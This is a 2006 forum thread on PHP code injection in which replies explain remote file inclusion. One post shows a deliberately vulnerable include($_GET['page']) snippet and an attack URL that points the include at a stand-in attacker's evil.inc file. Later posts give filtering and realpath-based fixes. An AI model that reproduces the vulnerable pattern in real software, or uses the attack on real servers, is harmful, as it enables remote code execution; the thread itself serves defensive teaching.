
PHP Injection

Posted: Sun Apr 02, 2006 12:21 am
by fambi
Hi everyone,

I'm new to the forum and thank you all for providing this security forum.

I can appreciate the idea of some malicious user injecting script into my html, or modifying my sql's with an sql injection, but is it possible for someone to inject php code using an unfiltered textarea (for example)?

Thanks.

Posted: Sun Apr 02, 2006 12:43 am
by feyd
Possible, yes, but for your scripts to actually run it, you'd need some very specific code. eval() would have to be used, most likely. Although if you save data into a file and can be tricked into loading that file, that will do it too.

Posted: Sun Apr 02, 2006 12:55 am
by fambi
Thanks feyd.

(To keep threads on topic, i've begun another thread over at viewtopic.php?p=251801#251801 - your help over there would be also appreciated.)

Posted: Mon Apr 03, 2006 8:34 am
by Maugrim_The_Reaper
If allow_url_fopen is enabled in your php.ini configuration, include() and require() calls can also accept a URL to the file to include. If this is possible, allowing an unfiltered/unvalidated variable to be prepended to an include path can result in an attacker exploiting this remote capability to point the include request to a remote file they themselves have written. This is even more dangerous if they know enough information to be capable of accurately guessing your webroot and lower directory paths.

Simple example:

You create an application file which loads a database connection. You also include a file (perhaps as part of a simple front controller).

Code:

<?php
// load database connection

// VULNERABLE: the "page" request parameter goes straight into include()
if(isset($_GET['page']) && !empty($_GET['page'])) {
	include($_GET['page'] . '.inc'); // with allow_url_fopen on, a URL is accepted here
} else {
	include('index.inc');
}

exit;
Now the attacker could simply store a PHP file called "evil.inc" at http://example.com/evil.inc and call the request (to your script):

http://www.yourserver.com/index.php?pag ... m/evil.inc

Result?

Your include() will use the "page" GET variable, fetch and parse the evil.inc script, and execute it. If they know your application well enough (error messages are a huge help there) they can manage to do a lot - basically anything YOU could do from PHP on your server.

Fix?

Check all user variables.

Code:

<?php
// load database connection

$clean = array(); // store filtered variables separately

// filter, filter, filter - check all characters are alphabetical (no colons, slashes, periods...)
if(isset($_GET['page']) && !empty($_GET['page']) && ctype_alpha($_GET['page'])) {
	$clean['page'] = $_GET['page'];
} else {
	$clean['page'] = 'index'; // fall back to the default page
}

// only the filtered value ever reaches include()
if($clean['page']) include($clean['page'] . '.inc');

exit;
The solution here is to only allow alphabetic characters in the values - negating slash/period/colon characters means no url will be accepted to taint our script...

Posted: Mon Apr 03, 2006 9:02 am
by fambi
Thanks for the input.

Posted: Mon Apr 03, 2006 9:04 am
by timvw
- I usually build up a $filelocation that contains the page location.
- Then I check if the file exists and if it's readable.
- Then I check if the realpath of the location is a subpath of my $base_path (avoid most of the ../ tricks).
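
The three steps above, combined with the character allow-list from the earlier post, as an added example (not timvw's or Maugrim_The_Reaper's code); the function name resolvePage, the $basePath argument and the ./pages directory are assumptions for the illustration:

```php
<?php
// Added example: resolve a requested page name to a file under $basePath and
// refuse anything that would escape it. Names here are assumptions, not
// code from the thread.
declare(strict_types=1);

/**
 * Return the absolute path of the page file to include, or null when the
 * request must be rejected.
 */
function resolvePage(string $basePath, string $page): ?string
{
    // 1. Allow-list the characters first (same idea as ctype_alpha above):
    //    letters, digits, underscore and dash, so no scheme, colon, slash
    //    or period can ever form a URL or a directory step.
    if ($page === '' || !preg_match('/^[A-Za-z0-9_-]+$/', $page)) {
        return null;
    }

    // 2. Build the file location from a fixed base directory and extension.
    $base = realpath($basePath);
    if ($base === false) {
        return null; // the base directory itself does not exist
    }
    $location = $base . DIRECTORY_SEPARATOR . $page . '.inc';

    // 3. The file must exist and be readable.
    if (!is_file($location) || !is_readable($location)) {
        return null;
    }

    // 4. Canonicalise and confirm the result is still inside $base
    //    (covers ../ and symlink tricks; realpath() never yields a URL).
    $real   = realpath($location);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($real === false || strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Usage, assuming the page files live in ./pages next to this script:
$file = resolvePage(__DIR__ . '/pages', $_GET['page'] ?? 'index');
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file;
```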

Posted: Mon Apr 03, 2006 9:05 am
by fambi
Thanks.